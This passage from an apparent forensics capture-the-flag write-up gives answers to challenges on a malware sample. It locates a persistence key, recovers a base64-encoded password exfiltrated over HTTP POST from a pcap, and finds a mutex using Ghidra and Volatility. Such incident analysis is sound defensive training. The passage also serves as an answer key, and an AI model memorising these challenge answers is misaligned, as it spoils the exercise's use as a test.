Load the SYSTEM hive extracted from the memory into Registry Explorer. Do a keyword search for `main.exe` as shown in the figure below:

![Erge](pics/persistence.png)


#### Answer: "System\\CurrentControlSet\\Services\\Spooler"  or "System\\CurrentControlSet\\Services\\TCPIP6"

## <font color=purple>Erge 16</font>

What password is exfiltrated by the malware?

### Solution:

Knowing the attacker exfiltrated **ics-pw.txt**, go to back to where it was found on the pcap file **2018-08-10_14-39-00.pcap**. Filter the packets to find the text file (ip.addr == 52.95.251.150 && http.request.method == POST). 

![Erge](pics/Erge45.png)

Click on the packet with the text file. Look at the Packet bytes pane and notice a data string was posted out. 

![Erge](pics/Erge46.png)

The string is encoded in base64. Decode using Cyberchef. The decoded version is **ICS - He73qOc9z**. Assume the password is the second half of the decoded string.

![Erge](pics/Erge47.png)

#### Answer: He73qOc9z

## <font color=purple>Erge 17</font>

What mutex does the malware create?

### Solution:

"A mutex is a program object that is created so that multiple program thread can take turns sharing the same resource, such as access to a file." 

Looking at **main.exe** in Ghidra for any API calls to CreateMutex shows the following:

![Erge](pics/mutexinghidra.png)

Examine the memory to see if `main.exe` has that mutex open with the following command:

In [18]:
vol.py -f ..\memory\PC-1\20180821124001\memory\data.lime --profile=Win7SP1x64 handles -p 1028

Volatility Foundation Volatility Framework 2.6.1
Offset(V)             Pid             Handle             Access Type             Details
------------------ ------ ------------------ ------------------ ---------------- -------
0xfffff8a000b55bb0   1028                0x4                0x9 Key              MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS
0xfffff8a000903500   1028                0x8                0x3 Directory        KnownDlls
0xfffff8a007cfe940   1028                0xc                0x3 Directory        KnownDlls32
0xfffffa8002ccb130   1028               0x10           0x100020 File             \Device\HarddiskVolume2\Windows
0xfffff8a000c8ffa0   1028               0x14                0x9 Key              MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS
0xfffff8a007cfe940   1028               0x18                0x3 Directory        KnownDlls32
0xfffffa8002ce69c0   1028               0x1c           0x

The handle listing from memory also shows the mutant `ApiPortection` as the mutex

#### Answer: ApiPortection